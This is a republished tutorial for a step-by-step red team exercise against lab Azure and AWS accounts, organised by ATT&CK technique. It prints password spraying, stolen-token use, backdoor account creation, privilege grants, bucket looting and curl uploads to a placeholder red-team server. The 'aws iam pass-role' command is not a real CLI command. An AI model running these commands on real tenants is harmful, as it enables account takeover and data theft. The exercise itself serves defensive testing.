██FR█████ █INTELL███████████

From Recon to Exfiltration: A Step-by-Step Red Team Exercise in Azure and AWS


This content originally appeared on DEV Community and was authored by Eng Soon Cheah


This will cover:

  1. Preparation & Scope
  2. Step-by-Step Attack Simulation (per cloud)
  3. Tools & Command Examples
  4. Detection & Response Checks

1. Preparation & Scope

Environment

  • Azure: Create a separate tenant/subscription for testing; deploy dummy resources (VMs, Storage Accounts, Function Apps, SharePoint) with seeded dummy data.
  • AWS: Use a sandbox account (or AWS Organizations member account with no production trust) and deploy S3 buckets, EC2 instances, Lambda functions, IAM roles, and users with varying privilege levels.

Rules of Engagement

  • No real destructive changes to production
  • No real credentials outside the lab
  • Simulated payloads only (no actual malware)
  • All actions logged for review

2. Step-by-Step Red Team Exercise

Azure Exercise

Phase 1 – Reconnaissance

Objective: Map Azure AD and resource landscape

  • T1087.004 – Cloud Account Discovery 
# List all Azure AD users
az ad user list --query '[].{displayName:displayName,userPrincipalName:userPrincipalName}'
  • T1526 – Cloud Service Discovery 
# List all available subscriptions
az account list --output table
  • Enumerate public storage accounts (simulated using test accounts) 
az storage account list --query '[?allowBlobPublicAccess==`true`].{name:name,resourceGroup:resourceGroup}'

Phase 2 – Initial Access

  • T1110.003 – Password Spraying (Safe Simulation) 
for user in $(cat users.txt); do
  az login -u $user -p 'Winter2025!' --allow-no-subscriptions
done
  • T1078 – Valid Accounts (Simulated Stolen Token) 
export AZURE_ACCESS_TOKEN="eyJhbGciOi..."
az rest --method get --url https://graph.microsoft.com/v1.0/me --headers "Authorization=Bearer $AZURE_ACCESS_TOKEN"

Phase 3 – Privilege Escalation

  • T1098.001 – Additional Cloud Credentials 
az ad sp create-for-rbac --name "backdoor-sp" --role Contributor
  • T1098.003 – Role Assignment Exploitation 
az role assignment create --assignee <SP_ID> --role Owner --scope /subscriptions/<SUB_ID>

Phase 4 – Persistence

  • T1136.003 – Cloud Account Creation (Create long-lived backdoor SP)
  • Add OAuth app with overprivileged Graph permissions (simulated consent phishing)

Phase 5 – Lateral Movement

  • T1530 – Data from Cloud Storage 
az storage blob list --container-name mycontainer --account-name mystorageaccount
  • Cross-subscription enumeration 
az role assignment list --all

Phase 6 – Exfiltration

  • T1041 – Exfiltration Over HTTPS (Simulated) 
curl -X POST -F "file=@dummydata.zip" https://<redteam-server>/upload

Phase 7 – Cleanup

  • Remove SPs, roles, and OAuth apps created in lab 
az ad sp delete --id <SP_ID>

AWS Exercise

Phase 1 – Reconnaissance

  • T1087.004 – Cloud Account Discovery 
aws iam list-users
  • T1538 – Cloud Infrastructure Discovery 
aws ec2 describe-instances
aws s3 ls

Phase 2 – Initial Access

  • T1078 – Valid Accounts (Simulated Compromised Keys) 
export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="secret..."
aws sts get-caller-identity
  • T1526 – Cloud Service Discovery 
aws lambda list-functions

Phase 3 – Privilege Escalation

  • T1098.004 – Additional Cloud Roles 
aws iam attach-user-policy --user-name testuser --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
  • T1078.004 – PassRole Abuse 
aws iam pass-role --role-name HighPrivilegeRole --role-session-name attack-session

Phase 4 – Persistence

  • T1136.003 – Cloud Account Creation 
aws iam create-user --user-name backdoor
aws iam create-access-key --user-name backdoor

Phase 5 – Lateral Movement

  • Cross-account role enumeration: 
aws sts assume-role --role-arn arn:aws:iam::<account-id>:role/CrossAccountRole --role-session-name attacker
  • S3 sensitive file search: 
aws s3 sync s3://target-bucket ./loot --exclude "*" --include "*.csv"

Phase 6 – Exfiltration

  • T1041 – HTTPS Transfer (Simulated) 
curl -F "file=@loot.zip" https://<redteam-server>/upload

Phase 7 – Cleanup

  • Remove IAM users, roles, and policies created during test 
aws iam delete-user --user-name backdoor

3. Tools to Use

4. Detection & Response Checks

  • Azure: Ensure Microsoft Defender for Cloud and Sentinel trigger alerts for:

    • Unusual sign-ins
    • New Service Principals
    • Role assignment changes

  • AWS: Ensure GuardDuty and Security Hub trigger alerts for:

    • New IAM user creation
    • Cross-account role assumption
    • S3 bucket data access anomalies


This content originally appeared on DEV Community and was authored by Eng Soon Cheah